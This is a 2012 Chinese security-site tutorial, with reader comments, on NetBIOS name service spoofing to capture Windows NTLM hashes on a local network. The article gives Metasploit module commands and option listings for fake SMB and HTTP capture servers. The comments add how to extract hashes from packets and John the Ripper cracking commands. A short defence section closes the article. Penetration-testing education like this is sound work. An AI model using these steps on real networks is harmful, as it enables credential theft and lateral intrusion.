netbios ssn

FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
使用NetBios Spoofing技术渗透内网 thanks认证作者专栏作者2012-08-07共453813人围观 ，发现 46 个不明物体 WEB安全文章
Author:Thanks
Site:http://www.freebuf.com

一 前言

我们知道，在做内网渗透的时候，ARP欺骗、DNS欺骗等手法往往影响较大，且由于上述技术相对古老，防御软件多，加上现在很多的网络设备也逐渐拥有了ARP欺骗防御功能，所以种种情况无疑为我们的内网渗透增加了难度。

最近我在渗透测试工作中用到NetBios Spoofing技术，这种技术对WIN系列XP, 2003, Vista, 7, 2008均有效，能不依赖于ARP Spoofing以较小的成本抓取系统Hash。

二 NetBIOS Name Service (NBNS) 描述

NETBIOS协议是一种在局域网上的程序可以使用的应用程序编程接口（API），为程序提供了请求低级服务的统一的命令集，作用是为了给局域网提供网络以及其他特殊功能，系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，实现信息通讯，所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享。
Windows做DNS解析时有如下步骤：

1.local hosts file - C:\Windows\System32\drivers\etc\hosts
2.DNS
3.NBNS
那么当访问者输入一个不存在的域名，而LOCAL HOST FILE、DNS服务器均无法给出解析时，我们可爱又人性化的Windows就会发送NBNS请求进行查询。

使用NetBios Spoofing技术渗透内网

请仔细看看上图的抓包，你会发现最给力的是：NBNS请求它是一个广播包！
即任何人可以回复并重定向流量，而不依赖于ARP欺骗。这非常神奇…

使用NetBios Spoofing技术渗透内网

讲到现在大家一定思路清晰了：当下我们的目的是回复NBNS响应，从而转移流量进行欺骗。

三 利用方法

NetBios Spoofing利用方法目前来说有两种：HTTP和SMB。
我们先打开Metasploit，使用nbns_response模块，然后设置欺骗IP：

使用NetBios Spoofing技术渗透内网

SMB:

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /home/tm/johnsmb
JOHNPWFILE => /home/tm/johnsmb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE /home/tm/johnsmb no The prefix to the local filename to store the hashes in JOHN format
LOGFILE no The local filename to store the captured hashes
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
HTTP：

msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /home/tm/httplog
LOGFILE => /home/tm/johnhttp
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80
四 场景

1.同交换环境下，有WINDOWS主机访问不存在的域名，如：http://thanks1132124324.com

使用NetBios Spoofing技术渗透内网

2.同交换环境下，有WINDOWS主机进行不存在的SMB通信，如：\\thanks1132124324

使用NetBios Spoofing技术渗透内网

如上图，通过以上两种方法我们均能获取被攻击者的HASH（测试机使用的是WIN7）。
而在获得HASH之后，诸如破解、HASH传递等进一步渗透的方法在此不再赘述。值得注意的是，高版本WINDOWS系统由于HASH存储机制的不同（NTLMv2），破解起来难度较大。

五 防御方法

1.使用高版本的WINDOWS系统，使用高强度的密码，以加大HASH破解难度
2.关闭TCP/IP Netbios功能

thanks
thanks
70 篇文章
等级： 8级
||
上一篇：Iframe安全威胁下一篇：[翻译]如何渗透测试WordPress网站
这些评论亮了

thanks (8级)FreeBuf常务处主任回复
@lion_00 msf nbns模块使用一个固定的chanllenge值（请留意option），所以依然可以爆破hash
)10(亮了

河蟹 回复
原文地址
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
)6(亮了
发表评论已有 45 条评论

shell 2012-08-07回复 1楼
这招不错！

亮了(4)

phper 2012-08-07回复 2楼
NetBios这个服务网络共享要用到，大多数局域网应该都开着的吧。。

亮了(4)

bryan 2012-08-07回复 3楼
默认是开的，在内网渗透是一种不错的攻击手法。

亮了(3)

hellok 2012-08-07回复 4楼
围观+1

亮了(1)

oyes 2012-08-07回复 5楼
为啥会带着hash呢。。这个ndns

亮了(1)

kelz 认证作者(7级) FreeBuf保安队队长 2012-08-07回复
@oyes 在访问smb共享过程中，会发送LM&NT HASH到服务端进行认证，这个时候做嗅探或劫持对然后对获取到的数据包进行过滤之后就能得到LM&NT HASH值了。

亮了(1)

OD 2012-08-07回复
@kelz 用户随便输入什么都记录….觉得比较不好用

亮了(1)

kelz 认证作者(7级) FreeBuf保安队队长 2012-08-09回复
@OD 所以数据包要做一些过滤之类的，包里去掉物理帧头、IP头和TCP头，再去掉4个字节的NETB头，剩下的就是SMB包的内容，再去掉33个字节长的SMB Reponse header,然后向后做28个字节的偏移，下面的24个字节的内容就是LM HASH，紧接着的24个字节就是NT HASH。详细可看这里http://www.xfocus.net/articles/200305/538.html

亮了(2)

lion_00 2012-08-07回复 6楼
测试了一下，这个HASH好像是没有用的，每次都会变

亮了(1)

thanks 认证作者专栏作者(8级) FreeBuf常务处主任 2012-08-08回复
@lion_00 msf nbns模块使用一个固定的chanllenge值（请留意option），所以依然可以爆破hash

亮了(10)

坏虾 (1级) 2012-08-09回复
不会弄，麻烦教教呗

亮了(1)

小菜 2012-08-17回复
@thanks 每次变化的，也就是活不能使用HASH注入？

亮了(1)

thanks 认证作者专栏作者(8级) FreeBuf常务处主任 2012-08-21回复
@thanks 回头会再写一篇如何破解的:)

亮了(1)

xxxxxxxx 2014-06-29回复
@thanks 破解过程才是王道，这些大家应该都懂 就是破解不了。。

亮了(1)

acmfly (1级) 2012-08-19回复
@lion_00 的确会变

亮了(1)

Mister诺诺 2012-08-07回复 7楼
这个要Mark！//: 其实ms08-068漏洞根本没有补上，微软没有意识到这个漏洞的本质是什么，这个漏洞本质是自动发送密码泄露了密码，中间人攻击只是利用的一种方式，并且中间人攻击的补丁也只是针对反射回服务器SMB这一种攻击方式。//: mark

亮了(0)

Heee 2012-08-07回复 8楼
不错，可以看出作者对协议很熟悉~

亮了(2)

劉傑宏 2012-08-07回复 9楼
不知道为什么微软就不能将默认的NetBIOS禁止掉···泪

亮了(0)

THANKS呵呵呵 2012-08-07回复 10楼
多谢关注

亮了(0)

gogata (1级) 2012-08-07回复 11楼
学习了啊。。

亮了(1)

houwenhui (1级) 人生苦短，我用python。 2012-08-08回复 12楼
学习了，晚上尝试一下

亮了(1)

Crow 认证作者(3级) 百度安全工程师 2012-08-08回复 13楼
不错 msf是个强大的东西 内部包含了很多的exp 还可以自己写

亮了(1)

g0t3n (1级) 2012-08-08回复 14楼
很是强大….

亮了(1)

455968910 (1级) 2012-08-09回复 15楼
牛逼啊

亮了(1)

Gall (4级) 2012-08-10回复 16楼
:grin: 大家来顶死他

亮了(1)

枕簟 (1级) 2012-08-10回复 17楼
随便看看。

亮了(1)

init5 认证作者(3级) 招商银行安全员 2012-08-17回复 18楼
灰常有营养

亮了(4)

linxiaoxiao (1级) 2012-08-21回复 19楼
@thinks 去做了一下没有成功。欺骗的ip地址应该是安装msf的ip地址吧？

亮了(2)

thanks 认证作者专栏作者(8级) FreeBuf常务处主任 2012-08-21回复
@linxiaoxiao 是

亮了(1)

無情 (1级) 2012-08-28回复 20楼
netBios 早就被我关了。。

亮了(1)

有所坚持 (1级) 2012-08-28回复 21楼
今天看到试试，思路不错呀！谢谢！

亮了(1)

dlan (3级) xx00 2012-09-12回复 22楼
auxiliary/server/capture/smb 本地伪造SMB SERVER服务器

亮了(3)

80445062 (1级) 2012-09-12回复 23楼
@Thanks 你抓到的hash解密成功过没有？

只能抓到一半hash的，没办法解密的吧？

亮了(1)

Hevar 2012-09-15回复 24楼
新的方法！学习学习！

亮了(1)

xxghk (1级) 2012-10-21回复 25楼
仔细看了一下我们内部的网络发现netBios一直都是关闭的.没有测试

亮了(1)

mark 2012-11-06回复 26楼
子墨阳,【使用NetBios Spoofing技术渗透内网】收藏成功。本文正文大约需要12分钟的阅读时间，请访问 稍后再读! 你可以关注 获得私信提醒。

亮了(0)

Drizzle.Risk 2012-12-04回复 27楼
是不是必须开着wins服务？137？

亮了(1)

反恐小樱 (1级) 2013-02-23回复 28楼
我自己在虚拟机中测试，即便最简单的密码比如123456，捕获的HASH 根本没法破解

亮了(2)

河蟹 2013-09-29回复 29楼
原文地址

http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

亮了(6)

malayke 认证作者(3级) 2014-06-29回复 30楼
John the Ripper 破解 NTLM HASH 方法：

john –format=netntlmv2 hashes.txt

破解 LM 的 方法：

john –format=lm hashes.txt

亮了(1)

xxxxxxxx 2014-06-29回复 31楼
http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python

亮了(1)

ze0r 2014-06-29回复 32楼
为何HTTP访问会带着HASH？用WIRESHARK也没见抓到过HASH啊，为何？

亮了(1)

baobao亲爱的 2015-06-11回复
@ ze0r

亮了(0)

baobao亲爱的 2015-06-11回复
@ ze0r

前面已经说过了，因为1和2 都不存在这个域名 就到了nbns这个协议上了。。

Windows做DNS解析时有如下步骤：

1.local hosts file – C:\Windows\System32\drivers\etc\hosts

2.DNS

3.NBNS

亮了(0)

18229872445 (1级) 2016-12-15回复 33楼
设置完毕后需要开启抓包软件吗？不然我这里没反应啊。

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
thanks
thanks认证作者专栏作者

FreeBuf常务处主任

70
文章数
356
评论数
最近文章
扒一扒国外那些有趣的安全创业公司（一）
2017.04.25

匡恩网络招聘安全人才
2016.09.11

追踪溯源：希拉里邮箱泄露事件
2016.08.22

浏览更多
相关阅读
TEST LAB V8（二）：Cisco设备和Terminal系统浅谈内网渗透记一次完整的办公网渗透到idc过程再探内网（域）渗透如何通过WIFI渗透企业内网？
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank